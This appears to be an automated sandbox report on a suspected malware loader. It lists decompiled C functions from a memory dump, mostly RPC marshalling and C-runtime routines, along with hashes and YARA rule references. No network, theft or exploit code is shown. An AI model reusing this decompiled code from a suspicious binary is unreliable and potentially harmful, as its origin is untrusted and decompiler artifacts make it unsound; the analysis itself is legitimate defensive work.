                                                                                              0x6f71741f
                                                                                              0x6f71741f
                                                                                              0x6f71741f
                                                                                              0x6f71741f
                                                                                              0x00000000
                                                                                              0x6f717425
                                                                                              0x6f717408
                                                                                              0x6f717408
                                                                                              0x6f71740d
                                                                                              0x6f71740d
                                                                                              0x6f717410
                                                                                              0x00000000
                                                                                              0x6f717410
                                                                                              0x6f7173a5
                                                                                              0x6f7173a8
                                                                                              0x6f7173ac
                                                                                              0x6f7173d5
                                                                                              0x6f7173d5
                                                                                              0x6f7173d8
                                                                                              0x6f7173d8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7173da
                                                                                              0x6f7173de
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7173e0
                                                                                              0x6f7173e0
                                                                                              0x00000000
                                                                                              0x6f7173e0
                                                                                              0x6f7173ae
                                                                                              0x6f7173b1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7173b5
                                                                                              0x6f7173c8
                                                                                              0x6f7173ce
                                                                                              0x6f7173d1
                                                                                              0x6f7173d3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7173d3
                                                                                              0x6f71737d
                                                                                              0x6f717380
                                                                                              0x6f717382
                                                                                              0x6f717387
                                                                                              0x6f717387
                                                                                              0x6f71738c
                                                                                              0x00000000
                                                                                              0x6f71738c
                                                                                              0x6f717351
                                                                                              0x6f717356
                                                                                              0x6f71735a
                                                                                              0x6f71735a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6F71736C
                                                                                              • __isleadbyte_l.LIBCMT ref: 6F71739A
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6F7173C8
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6F7173FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: afae0147ed3f12cbbdd8ed09f17fd0d18c69b18532f9b35602758714cfebcf13
                                                                                              • Instruction ID: 5cec14386f4354fdb3105f041c810a8aa66e97e014547efb8cc9508d1045954a
                                                                                              • Opcode Fuzzy Hash: afae0147ed3f12cbbdd8ed09f17fd0d18c69b18532f9b35602758714cfebcf13
                                                                                              • Instruction Fuzzy Hash: EC318231608246ABDB11CE75CA44BAA7FB5FF41310F194579E8649B1D0E730E86ADB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F711E8C, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F711E8C(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E6F7123DD(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E6F711F12(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E6F712658(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E6F712597(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                                                              0x6f711e8f
                                                                                              0x6f711e95
                                                                                              0x6f711f08
                                                                                              0x00000000
                                                                                              0x6f711e9c
                                                                                              0x6f711e9c
                                                                                              0x6f711e9f
                                                                                              0x6f711eba
                                                                                              0x6f711ebd
                                                                                              0x6f711edd
                                                                                              0x6f711eef
                                                                                              0x6f711ebf
                                                                                              0x6f711ebf
                                                                                              0x6f711ec2
                                                                                              0x00000000
                                                                                              0x6f711ec4
                                                                                              0x6f711ed6
                                                                                              0x6f711ed6
                                                                                              0x6f711ec2
                                                                                              0x6f711f0d
                                                                                              0x6f711f11
                                                                                              0x6f711ea1
                                                                                              0x6f711eb9
                                                                                              0x6f711eb9
                                                                                              0x6f711e9f

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction ID: b7b421d0605aa24c798dea01504b04d2ce1791be9113d9c2b30ac512ff82a928
                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction Fuzzy Hash: D601783200814EBBCF028E94CE01CEE3F2BBB29355B488525FE2858470D372D5B9EB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F705070, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 181COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 53%
                                                                                              			E6F705070(void* __eflags, int _a4, intOrPtr _a8, signed short* _a12) {
				signed char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t121;
				intOrPtr _t123;
				intOrPtr _t129;
				intOrPtr _t166;
				void* _t204;
				void* _t206;

				_v8 = 0;
				_v16 = 0;
				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_v28 = 0;
				0x6f700000("(%p,%p,%p)\n", _a4, _a8, _a12);
				E6F7073B0(_a4 + 0x14, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
				_t206 = _t204 + 0x18;
				if( *((intOrPtr*)(_a4 + 0x30)) == 0) {
					_t166 = _a4;
					_t212 =  *((intOrPtr*)(_t166 + 0x6c));
					if( *((intOrPtr*)(_t166 + 0x6c)) == 0) {
						_v36 =  *((intOrPtr*)(_a4 + 0x30));
						_v12 =  *((intOrPtr*)(_a4 + 0x14));
						 *((intOrPtr*)(_a4 + 0x30)) = 1;
						E6F705070(_t212, _a4, _a8, _a12);
						 *((intOrPtr*)(_a4 + 0x30)) = _v36;
						 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
						_v32 = 1;
						0x6f700000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x6c)) - _v12);
						_t206 = _t206 + 8;
						 *((intOrPtr*)(_a4 + 0x14)) = _v12;
					}
				}
				_a12 =  &(_a12[2]);
				if( *_a12 != 0) {
					_v8 = _a12 +  *_a12;
				}
				_a12 =  &(_a12[1]);
				if(( *_a12 & 0x0000ffff) != 0) {
					_v16 = _a12 + ( *_a12 & 0x0000ffff);
				}
				_a12 =  &(_a12[1]);
				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
				if(_v8 != 0) {
					_t129 = _a4;
					0x6f700000(_t129, _a12);
					_v40 = _t129;
					E6F70CC40( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
					_t206 = _t206 + 0x18;
					_v20 =  *((intOrPtr*)(_a4 + 0x3c));
					_v24 =  *((intOrPtr*)(_a4 + 0x44));
					_v28 =  *((intOrPtr*)(_a4 + 0x40));
				}
				_t121 = E6F708B40(_a4, _a8, _a12, _v16);
				_a8 = _t121;
				if(_v8 != 0) {
					 *((intOrPtr*)(_a4 + 0x3c)) = _v20;
					 *((intOrPtr*)(_a4 + 0x44)) = _v24;
					 *((intOrPtr*)(_a4 + 0x40)) = _v28;
					_t121 = E6F70CE70( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
				}
				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
				if(_v32 == 0) {
					return _t121;
				} else {
					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 0x6c));
					_t123 = _a4;
					 *((intOrPtr*)(_t123 + 0x6c)) = 0;
					return _t123;
				}
			}



















                                                                                              0x6f705076
                                                                                              0x6f70507d
                                                                                              0x6f70508a
                                                                                              0x6f70508d
                                                                                              0x6f705094
                                                                                              0x6f70509b
                                                                                              0x6f7050a2
                                                                                              0x6f7050ba
                                                                                              0x6f7050dc
                                                                                              0x6f7050e1
                                                                                              0x6f7050eb
                                                                                              0x6f7050ed
                                                                                              0x6f7050f0
                                                                                              0x6f7050f4
                                                                                              0x6f7050fc
                                                                                              0x6f705105
                                                                                              0x6f70510b
                                                                                              0x6f70511e
                                                                                              0x6f705129
                                                                                              0x6f705135
                                                                                              0x6f705138
                                                                                              0x6f70514e
                                                                                              0x6f705153
                                                                                              0x6f70515c
                                                                                              0x6f70515c
                                                                                              0x6f7050f4
                                                                                              0x6f705165
                                                                                              0x6f705170
                                                                                              0x6f70517b
                                                                                              0x6f70517b
                                                                                              0x6f705184
                                                                                              0x6f70518f
                                                                                              0x6f70519a
                                                                                              0x6f70519a
                                                                                              0x6f7051a3
                                                                                              0x6f7051ac
                                                                                              0x6f7051b3
                                                                                              0x6f7051b9
                                                                                              0x6f7051bd
                                                                                              0x6f7051c5
                                                                                              0x6f7051e7
                                                                                              0x6f7051ec
                                                                                              0x6f7051f5
                                                                                              0x6f7051fe
                                                                                              0x6f705207
                                                                                              0x6f705207
                                                                                              0x6f70521a
                                                                                              0x6f705222
                                                                                              0x6f705229
                                                                                              0x6f705231
                                                                                              0x6f70523a
                                                                                              0x6f705243
                                                                                              0x6f705264
                                                                                              0x6f705269
                                                                                              0x6f705272
                                                                                              0x6f705279
                                                                                              0x6f705294
                                                                                              0x6f70527b
                                                                                              0x6f705284
                                                                                              0x6f705287
                                                                                              0x6f70528a
                                                                                              0x00000000
                                                                                              0x6f70528a

                                                                                              APIs
                                                                                              • _NdrComplexStructBufferSize@12.RGSBZEOG(00000000,00000000,00000000), ref: 6F70511E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: BufferComplexSize@12Struct
                                                                                              • String ID: (%p,%p,%p)$difference = 0x%x
                                                                                              • API String ID: 1319815426-1308788287
                                                                                              • Opcode ID: a2b6e62a2b53d3073c3d19b9e1da847cd986674872383a321c9ad1f7918b9f09
                                                                                              • Instruction ID: 8564d4ffdfedc379e4c9a5eb55b9e2dc607108cedbeae384df4c95b5b0b04630
                                                                                              • Opcode Fuzzy Hash: a2b6e62a2b53d3073c3d19b9e1da847cd986674872383a321c9ad1f7918b9f09
                                                                                              • Instruction Fuzzy Hash: 3781E5B4A00209EFDB08DF98D990AAE7BF5FF88314F108559E8189B345D335EA51CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F703FC0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 62%
                                                                                              			E6F703FC0(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t96;
				intOrPtr _t110;
				void* _t172;
				void* _t173;
				void* _t176;

				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t173 = _t172 + 0x14;
				if(( *_a12 & 0x000000ff) == 0x1f || ( *_a12 & 0x000000ff) == 0x20) {
					_v5 = (_a12[1] & 0x000000ff) + 1;
					if(( *_a12 & 0x000000ff) != 0x1f) {
						_a12 =  &(_a12[2]);
						_v16 =  *_a12;
						_a12 =  &(_a12[4]);
						_v12 =  *_a12;
						_a12 =  &(_a12[4]);
					} else {
						_a12 =  &(_a12[2]);
						_v16 =  *_a12 & 0x0000ffff;
						_a12 =  &(_a12[2]);
						_v12 =  *_a12 & 0x0000ffff;
						_a12 =  &(_a12[2]);
					}
					_v28 =  *_a12 & 0x0000ffff;
					_a12 =  &(_a12[2]);
					_a12 = E6F70A540(_v12, _a4, _a12, _v12);
					E6F7073D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
					_t96 = E6F70AEC0(_v28,  *((intOrPtr*)(_a4 + 0x44)));
					_t176 = _t173 + 0x1c;
					_v20 = _t96;
					_v32 =  *((intOrPtr*)(_a4 + 0x40));
					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
						_a16 = 1;
					}
					_t133 = _a16 & 0x000000ff;
					if((_a16 & 0x000000ff) != 0) {
						_t110 = E6F70A3B0(_t133, _a4, _v16);
						_t176 = _t176 + 8;
						 *_a8 = _t110;
					}
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					_v24 =  *((intOrPtr*)(_a4 + 0x10));
					E6F70AF00(_a4, _v20);
					E6F70C2B0(_a4, _v24,  *_a8, _a12, _a16 & 0x000000ff);
					E6F7100E0( *_a8 + _v32, _v24, _v20);
					return 0;
				} else {
					0x6f700000("invalid format type %x\n",  *_a12 & 0x000000ff);
					 *0x6f700000(0x6e6);
					return 0;
				}
			}















                                                                                              0x6f703fdc
                                                                                              0x6f703fe1
                                                                                              0x6f703ff6
                                                                                              0x6f70404d
                                                                                              0x6f704062
                                                                                              0x6f704099
                                                                                              0x6f7040a1
                                                                                              0x6f7040aa
                                                                                              0x6f7040b2
                                                                                              0x6f7040bb
                                                                                              0x6f704064
                                                                                              0x6f70406a
                                                                                              0x6f704073
                                                                                              0x6f70407c
                                                                                              0x6f704085
                                                                                              0x6f70408e
                                                                                              0x6f70408e
                                                                                              0x6f7040c4
                                                                                              0x6f7040cd
                                                                                              0x6f7040e4
                                                                                              0x6f7040f3
                                                                                              0x6f704106
                                                                                              0x6f70410b
                                                                                              0x6f70410e
                                                                                              0x6f704117
                                                                                              0x6f704120
                                                                                              0x6f70412a
                                                                                              0x6f70412a
                                                                                              0x6f70412e
                                                                                              0x6f704134
                                                                                              0x6f70413e
                                                                                              0x6f704143
                                                                                              0x6f704149
                                                                                              0x6f704149
                                                                                              0x6f704154
                                                                                              0x6f70415d
                                                                                              0x6f704168
                                                                                              0x6f704187
                                                                                              0x6f7041a0
                                                                                              0x00000000
                                                                                              0x6f70400c
                                                                                              0x6f704021
                                                                                              0x6f70402e
                                                                                              0x00000000
                                                                                              0x6f704034

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: (%p, %p, %p, %d)$invalid format type %x
                                                                                              • API String ID: 4104443479-658257468
                                                                                              • Opcode ID: 2f9c09c5912ed2d69bc92735e4b6b2595b4518a46d5e64e6292394b6c81193e2
                                                                                              • Instruction ID: 3dcd64fcca465d1c9ec833b67a7bf90c287e9a1f062eeeb3f7236d1936b1b294
                                                                                              • Opcode Fuzzy Hash: 2f9c09c5912ed2d69bc92735e4b6b2595b4518a46d5e64e6292394b6c81193e2
                                                                                              • Instruction Fuzzy Hash: 86613BF5A042499FCB08CF58D990AAF7BF5BF89304F148569F9199B345D730EA60CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F705640, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 37%
                                                                                              			E6F705640(int _a4, WCHAR* _a8, signed char* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t72;
				intOrPtr _t73;

				_v8 = 0;
				0x6f700000("(%p,%p,%p)\n", _a4, _a8, _a12);
				if(( *_a12 & 0x000000ff) != 0x21) {
					0x6f700000("invalid format type %x\n",  *_a12 & 0x000000ff);
					return  *0x6f700000(0x6e6);
				}
				if( *((intOrPtr*)(_a4 + 0x30)) == 0 &&  *((intOrPtr*)(_a4 + 0x6c)) == 0) {
					_v12 =  *((intOrPtr*)(_a4 + 0x30));
					_v28 =  *((intOrPtr*)(_a4 + 0x14));
					_v24 =  *((intOrPtr*)(_a4 + 0x3c));
					_v20 =  *((intOrPtr*)(_a4 + 0x40));
					_v16 =  *((intOrPtr*)(_a4 + 0x44));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					E6F705640(_a4, _a8, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v12;
					 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
					_v8 = 1;
					 *((intOrPtr*)(_a4 + 0x44)) = _v16;
					 *((intOrPtr*)(_a4 + 0x40)) = _v20;
					 *((intOrPtr*)(_a4 + 0x3c)) = _v24;
					 *((intOrPtr*)(_a4 + 0x14)) = _v28;
				}
				E6F70CC40(0x21, _a4, _a8, _a12);
				_t72 = E6F70CE70(0x21, _a4, _a8, _a12, 1);
				if(_v8 != 0) {
					_t73 =  *((intOrPtr*)(_a4 + 0x6c));
					 *((intOrPtr*)(_a4 + 0x14)) = _t73;
					 *((intOrPtr*)(_a4 + 0x6c)) = 0;
					return _t73;
				}
				return _t72;
			}











                                                                                              0x6f705646
                                                                                              0x6f70565e
                                                                                              0x6f705678
                                                                                              0x6f70568f
                                                                                              0x00000000
                                                                                              0x6f70569c
                                                                                              0x6f7056ae
                                                                                              0x6f7056c7
                                                                                              0x6f7056d0
                                                                                              0x6f7056d9
                                                                                              0x6f7056e2
                                                                                              0x6f7056eb
                                                                                              0x6f7056f1
                                                                                              0x6f705704
                                                                                              0x6f70570f
                                                                                              0x6f70571b
                                                                                              0x6f70571e
                                                                                              0x6f70572b
                                                                                              0x6f705734
                                                                                              0x6f70573d
                                                                                              0x6f705746
                                                                                              0x6f705746
                                                                                              0x6f705757
                                                                                              0x6f70576f
                                                                                              0x6f70577b
                                                                                              0x6f705783
                                                                                              0x6f705786
                                                                                              0x6f70578c
                                                                                              0x00000000
                                                                                              0x6f70578c
                                                                                              0x6f705796

                                                                                              APIs
                                                                                              • _NdrComplexArrayBufferSize@12.RGSBZEOG(00000001,?,?), ref: 6F705704
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ArrayBufferComplexSize@12
                                                                                              • String ID: (%p,%p,%p)$invalid format type %x
                                                                                              • API String ID: 3462415225-814374321
                                                                                              • Opcode ID: ce3ab0788cf441bc9163e5ffdb6e8e318320869d0f8a5d9f24873f816a3ab7bb
                                                                                              • Instruction ID: 89869cb98d53ff76f0eebb8122bf33315b4934113ac42adfc75feb0ad0962ee9
                                                                                              • Opcode Fuzzy Hash: ce3ab0788cf441bc9163e5ffdb6e8e318320869d0f8a5d9f24873f816a3ab7bb
                                                                                              • Instruction Fuzzy Hash: BC41D8B9A00209EFDB44DF48D594AAA7BB5FF88354F108159FD088B381D771EA91CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F7034D0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 64%
                                                                                              			E6F7034D0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _t67;
				void* _t100;
				void* _t102;
				void* _t103;

				_v12 = _a12[2] & 0x0000ffff;
				0x6f700000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				E6F7073D0(_a12, _a4 + 4, (_a12[1] & 0x000000ff) + 1);
				_t102 = _t100 + 0x1c;
				_t71 = _a16 & 0x000000ff;
				if((_a16 & 0x000000ff) == 0) {
					if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
						 *_a8 =  *((intOrPtr*)(_a4 + 4));
					}
				} else {
					_t67 = E6F70A3B0(_t71, _a4, _v12);
					_t102 = _t102 + 8;
					 *_a8 = _t67;
				}
				 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
				_v8 =  *((intOrPtr*)(_a4 + 0x10));
				E6F70AF00(_a4, _v12);
				_t103 = _t102 + 8;
				if(( *_a12 & 0x000000ff) == 0x16) {
					E6F70C2B0(_a4, _v8,  *_a8,  &(_a12[4]), _a16 & 0x000000ff);
					_t103 = _t103 + 0x14;
				}
				0x6f700000("copying %p to %p\n", _v8,  *_a8);
				if( *_a8 != _v8) {
					E6F7100E0( *_a8, _v8, _v12);
				}
				return 0;
			}









                                                                                              0x6f7034dd
                                                                                              0x6f7034f6
                                                                                              0x6f703518
                                                                                              0x6f70351d
                                                                                              0x6f703520
                                                                                              0x6f703526
                                                                                              0x6f703548
                                                                                              0x6f70355b
                                                                                              0x6f70355b
                                                                                              0x6f703528
                                                                                              0x6f703530
                                                                                              0x6f703535
                                                                                              0x6f70353b
                                                                                              0x6f70353b
                                                                                              0x6f703566
                                                                                              0x6f70356f
                                                                                              0x6f70357a
                                                                                              0x6f70357f
                                                                                              0x6f703594
                                                                                              0x6f7035b0
                                                                                              0x6f7035b5
                                                                                              0x6f7035b5
                                                                                              0x6f7035c7
                                                                                              0x6f7035d7
                                                                                              0x6f7035e7
                                                                                              0x6f7035ec
                                                                                              0x6f7035f4

                                                                                              APIs
                                                                                              • _memmove.LIBCMT ref: 6F7035E7
                                                                                                • Part of subcall function 6F70A3B0: _memset.LIBCMT ref: 6F70A3CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memmove_memset
                                                                                              • String ID: (%p,%p,%p,%d)$copying %p to %p
                                                                                              • API String ID: 3555123492-1064448161
                                                                                              • Opcode ID: 463194cdb1809a63c06e63d3d5e149a0595bf73c974e9359da32f2379770eec3
                                                                                              • Instruction ID: 91135ec1d8103120d0ab7f9d160fe6769dce170a580704ffa38e43fc9066ca1f
                                                                                              • Opcode Fuzzy Hash: 463194cdb1809a63c06e63d3d5e149a0595bf73c974e9359da32f2379770eec3
                                                                                              • Instruction Fuzzy Hash: 79414CB5A04248ABCB04DF68D990DAE7BF6AF89304F10C159FC199B355D730EA51CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F70DCB4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 76%
                                                                                              			E6F70DCB4(void* __ebx, void* __edi, void* __esi) {
				signed short _t55;
				intOrPtr _t57;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				void* _t103;
				void* _t105;
				void* _t109;
				void* _t110;

				 *(_t103 - 1) = ( *( *((intOrPtr*)(_t103 + 0x14)) + (1 << 0)) & 0x000000ff) + 1;
				 *((intOrPtr*)(_t103 + 0x14)) = E6F70A440( *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)) + 4);
				 *((intOrPtr*)(_t103 + 0x14)) = E6F70A540( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
				_t55 =  *(_t103 + 0xc);
				0x6f700000(_t55,  *((intOrPtr*)(_t103 + 0x14)));
				 *(_t103 - 8) = _t55;
				_t92 =  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c));
				_t57 = E6F70AEC0( *(_t103 - 8) & 0x0000ffff,  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
				_t109 = _t105 + 0x24;
				 *((intOrPtr*)(_t103 - 0x14)) = _t57;
				_t112 =  *(_t103 + 0x20) & 0x000000ff;
				if(( *(_t103 + 0x20) & 0x000000ff) == 0) {
					_push(0xab4);
					E6F70FA34(__ebx, _t92, __edi, __esi, _t112, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\0f112985b53f4edb9cf175c98caa4d9d\\Loader\\Project4\\Project4\\Source.c");
					_t109 = _t109 + 0xc;
				}
				if(( *(_t103 + 0x18) & 0x000000ff) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) == 0) {
					 *(_t103 + 0x18) = 1;
				}
				if(( *(_t103 + 0x18) & 0x000000ff) != 0) {
					_t69 = E6F70A3B0( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x14)));
					_t109 = _t109 + 8;
					 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) = _t69;
				}
				E6F7073D0( *(_t103 + 0xc) + 4,  *(_t103 + 0xc) + 4,  *(_t103 - 1) & 0x000000ff);
				_t110 = _t109 + 8;
				 *((intOrPtr*)(_t103 - 0x10)) =  *((intOrPtr*)( *(_t103 + 0xc) + 4));
				 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10))));
				 *((intOrPtr*)(_t103 - 0x28)) =  *((intOrPtr*)( *(_t103 + 0xc) + 0x44));
				 *((intOrPtr*)(_t103 - 0x1c)) = 0;
				while( *((intOrPtr*)(_t103 - 0x1c)) <  *((intOrPtr*)(_t103 - 0x28))) {
